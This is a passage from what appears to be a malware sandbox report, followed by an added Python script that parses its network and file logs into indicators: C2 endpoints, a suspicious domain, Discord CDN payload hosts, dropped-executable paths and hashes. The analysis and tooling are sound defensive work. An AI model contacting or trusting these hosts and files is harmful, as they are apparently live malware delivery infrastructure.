
memory/3632-316-0x0000000002A80000-0x0000000002B2C000-memory.dmp

memory/3012-317-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3932-318-0x000000000195C000-0x00000000019AB000-memory.dmp

memory/3012-319-0x0000000000400000-0x0000000000414000-memory.dmp
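
The Network and Files lists above are raw event logs: the sandbox writes one line per connection attempt and one entry per file event (write, load, execute), so the same endpoint and the same dropped file recur many times and the hash block for one path repeats verbatim. The Python script below is an added example, not part of the sandbox report or of any vendor tooling. It parses both formats exactly as they appear above (the excerpts it embeds are copied from this report's own lines), collapses repeats into an indicator set with hit counts, treats the queried name rather than the 8.8.8.8 resolver as the DNS indicator, flags endpoints on ports other than 80/443 (WEB_PORTS is an assumed heuristic; the report itself does not classify the 4805/tcp and 2151/tcp connections), and groups dropped files by SHA256, which shows from the report's own hashes that ~Xy1GPomKV09sC.Exe is a byte-identical copy of Tue196c8dc8316d5e.exe under another name. All function names are the example's own.

```python
import re
from collections import Counter

# Excerpt of the report's Network lines above: <country> <ip>:<port> [<name>] <proto>
NETWORK_EXCERPT = """\
US 162.159.135.233:443 cdn.discordapp.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
FR 91.121.67.60:2151 tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
"""

# Excerpt of the report's Files lines above: a path, then MD5/SHA1/SHA256/SHA512;
# memory/<pid>-... lines are dump references and carry no hashes.
FILES_EXCERPT = """\
memory/4188-276-0x0000000000000000-mapping.dmp

C:\\Users\\Admin\\AppData\\Local\\Temp\\~Xy1GPomKV09sC.Exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\\Users\\Admin\\AppData\\Local\\Temp\\~Xy1GPomKV09sC.Exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\\Users\\Admin\\AppData\\Local\\Temp\\7zSC36F0836\\Tue196c8dc8316d5e.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34
"""

NET_LINE = re.compile(r"^(?P<cc>[A-Z]{2}) (?P<ip>[0-9.]+):(?P<port>\d+)(?: (?P<host>\S+))? (?P<proto>tcp|udp)$")
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-f]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
WEB_PORTS = {80, 443}  # assumption: anything else is treated as a candidate C2 port

def parse_network(text):
    """One dict per connection line, in report order; repeats are kept here."""
    rows = [m.groupdict() for m in (NET_LINE.match(l.strip()) for l in text.splitlines()) if m]
    for r in rows:
        r["port"] = int(r["port"])
    return rows

def network_iocs(rows):
    """Collapse repeats into Counters of (ip, port, proto) and of DNS query names;
    for port-53 UDP lines the queried name is the indicator, not the resolver IP."""
    endpoints, dns_names = Counter(), Counter()
    for r in rows:
        if r["proto"] == "udp" and r["port"] == 53:
            dns_names[r["host"] or r["ip"]] += 1
        else:
            endpoints[(r["ip"], r["port"], r["proto"])] += 1
    return endpoints, dns_names

def unusual_endpoints(endpoints):
    """Endpoints outside plain HTTP/HTTPS: the first candidates for a block rule."""
    return sorted(e for e in endpoints if e[1] not in WEB_PORTS)

def parse_files(text):
    """(records, memdumps): one record per file event with its hash dict; dump refs kept apart."""
    records, memdumps, current = [], [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m:
            algo, digest = m.groups()
            if current is None or len(digest) != HASH_LEN[algo]:
                raise ValueError("orphaned or truncated hash line: " + line)
            current["hashes"][algo] = digest
        elif line.startswith("memory/"):
            memdumps.append(line)
            current = None
        else:
            current = {"path": line, "hashes": {}}
            records.append(current)
    return records, memdumps

def unique_files(records):
    """One entry per (path, SHA256): the report lists a file once per event (write, execute, ...)."""
    return {(r["path"], r["hashes"].get("SHA256")): r["hashes"] for r in records}

def same_content(records):
    """SHA256 -> sorted paths for digests seen under more than one path (one binary, several names)."""
    groups = {}
    for r in records:
        groups.setdefault(r["hashes"].get("SHA256"), set()).add(r["path"])
    return {sha: sorted(p) for sha, p in groups.items() if sha and len(p) > 1}

if __name__ == "__main__":
    ep, dns = network_iocs(parse_network(NETWORK_EXCERPT))
    print(unusual_endpoints(ep), dict(dns), same_content(parse_files(FILES_EXCERPT)[0]))
```

Run with python3 to print the collapsed indicator set. Fed the full Network and Files lists, the memory/<pid>-... entries come out separately because they reference dumps rather than files on disk, and a hash line whose digest has the wrong length raises instead of silently producing a bad indicator; the grouping by SHA256 is what turns a long list of repeated paths into the handful of distinct payloads this loader actually staged.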